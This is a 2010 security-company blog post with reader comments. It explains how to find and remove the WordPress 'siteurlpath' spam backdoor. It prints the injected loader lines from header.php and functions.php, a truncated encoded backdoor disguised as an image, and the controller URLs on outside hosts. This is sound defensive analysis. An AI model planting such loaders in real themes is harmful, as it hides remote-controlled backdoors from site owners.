• Skip to primary navigation
  • Skip to content
  • Skip to primary sidebar
  • Skip to footer

Sucuri Blog

Website Security News

  • Products
    • Website Security Platform
    • Website Firewall (WAF)
    • Enterprise Website Security
    • Multisite Solutions
  • Features
    • Detection
    • Protection
    • Performance
    • Response
    • Backups
  • Partners
    • Agency Solutions
    • Partners
    • Referral Program
    • Ecommerce
  • Resources
    • Guides
    • Webinars
    • Infographics
    • SiteCheck
    • Reports
    • Email Courses
  • Immediate Help
  • Login

Cleaning the “siteurlpath” hack on WordPress (wplinksforwork and hemoviestube spam bots)

August 4, 2010David Dede

0
SHARES
FacebookTwitterSubscribe

Recently we started to see a lot of WordPress sites hacked with malware hidden inside the wp_options -> siteurlpath table. The symptoms are very similar to the pharma hack (lots of SPAM hidden in the site), but in this case the SPAM is displayed to all users, not only search engines.

This is how an affected site looks like on our scanner:



Plus, all the sites infected receive “orders” (the spam links to display) from two sites: http://wplinksforwork.com and http://hemoviestube.com. Details about it later.

To get started cleaning your site, you first have to make sure WordPress is updated. If it is not, go ahead and update it before doing anything else.

Cleaning up the file system

The first place you have to clean is the file system. On all the sites we’ve cleaned so far, the malware was hidden in three files: header.php, functions.php and a random image file (void.jpg, test.jpg, lol.jpg, etc). All of them are inside your themes directory.

Inside the header.php, they added the following code:

$wp__theme_icon=create_function(”,file_get_contents(‘/path/wp-content/themes/themename/images/void.jpg’));$wp__theme_icon(); ?>

So it basically read the contents of void.jpg (which is not an image in reality, but a heavily encoded php backdoor):

$ZKb9g9=”x2f50x2e5150x2ex29″;$fF6B=”3YlJXYlR2X1Zmb0NWau9″;
$SH212J0g=’4x1ht1teJO+fIjr8RQGoOWFtXuBDqxzCadjGO9EcjVvq69bPPU14buBtN0d..
NEO6FzZWtSyGGW/FTBs0n/NTHDdcUzlmNU4lK9dkHkXDt/ZRN59cABTSNAtMP16vXW..
GWDBPxfz0Hemun9U1KfDzN+90qDvameU4y+OhbDXgYZxWNC8bsfHoRJ+yvbxy…
… lots and lots more…

Inside the functions.php, at the very bottom, the following code was added to load the siteurlpath option from the database where the spam itself is hidden:

if(!isset($siteurlpath)&& @get_option(‘siteurlpath’)){
$siteurlpath=create_function(”,(get_option(‘siteurlpath’)));
$siteurlpath();
}

So removing these 3 files should clean the file system for this kind of hack.

Cleaning up the database

Run the following query to see if your database is infected:

> select * from wp_options where option_name = ‘siteurlpath’;

If you see a large spill of php code in there, it means the db is infected.

This code basically acts as a backdoor for the attackers and print the SPAM to everyone else. This is the beginning of the backdoor (Magic shell):

As far as the spam, it loads them from two sites: http://wplinksforwork.com and http://hemoviestube.com.

a:2:{i:0;s:56:”http://wplinksforwork.com/561327853624756347509328/p.php”;
i:1;s:54:”http://hemoviestube.com/561327853624756347509328/p.php”;}

The code is full of protection to avoid getting detected and acts as a PHP bot to infect other sites. Both sites used to manage the SPAM bots point to the same IP address and we recommend hosting companies to block them:

# host hemoviestube.com
hemoviestube.com has address 95.168.177.94
# host wplinksforwork.com
wplinksforwork.com has address 95.168.177.94

You can see the scale of this attack by searching for these two sites on Google. You will see lots of sites generating errors when they were not able to reach the spam managers.

Warning: file_get_contents(http://wplinksforwork.com/561327853624756347509328/p.php?
[function.file-get-contents]: failed to …..

We will post more details later about this attack, but this should be enough to clean up the affected sites.


If your site is hacked (or contains malware), and you need help, send us an email at support@sucuri.net or visit our site: Sucuri Security Malware Removal. We can get your sites cleaned up right away.

Also, consider checking out our site security monitoring. We will monitor your sites 24×7 and alert you if it ever gets infected with malware, hacked or blacklisted.

0
SHARES
FacebookTwitterSubscribe

Categories: Website Malware Infections, WordPress SecurityTags: Hacked Websites, Malware Cleanup, SEO Spam

About David Dede

David is a Security Researcher at Sucuri. He spends most of his time dissecting vulnerabilities and security issues. You won't find him on Twitter because he is paranoid about privacy.

Reader Interactions

Comments

  1. Steven

    August 4, 2010

    G*D Damn It! These hackers, I mean we need to bomb them with predator drones or something this is really getting old.

    FAST

  2. Steven

    August 4, 2010

    Thanks for the heads up. It's appreciated.

  3. Kaliski

    August 6, 2010

    – I was thinking of using Blue Host for a wp blog…. but now I do not know. Any ideas.

  4. Raven

    January 14, 2012

    I was one of the 50k+ who was hacked.  I fixed it by updating to the newest version of WordPress, temporarily switching my theme to a new one, and then switching back.  The spammy links seem to be gone, so hopefully this will help those of you dealing with the same problem.

Primary Sidebar

Socialize With Sucuri

We're actively engaged across multiple platforms. Follow us and let's connect!

  • Facebook
  • Twitter
  • LinkedIn
  • YouTube
  • Instagram
  • RSS Feed

WordPress Security Course

The Anatomy of Website Malware Webinar

WordPress Security Guide

Join Over 20,000 Subscribers!

Footer

Products

  • Website Firewall
  • Website AntiVirus
  • Website Backups
  • WordPress Security
  • Enterprise Services

Solutions

  • DDos Protection
  • Malware Detection
  • Malware Removal
  • Malware Prevention
  • Blacklist Removal

Support

  • Blog
  • Knowledge Base
  • SiteCheck
  • Research Labs
  • FAQ

Company

  • About
  • Media
  • Events
  • Employment
  • Contact
  • Testimonials
  • Facebook
  • Twitter
  • LinkedIn
  • Instagram

Customer Login

Sucuri Home

  • Terms of Use
  • Privacy Policy
  • Frequently Asked Questions

© 2022 Sucuri Inc. All rights reserved

Sucuri Cookie Policy
See our policy>>

Our website uses cookies, which help us to improve our site and enables us to deliver the best possible service and customer experience.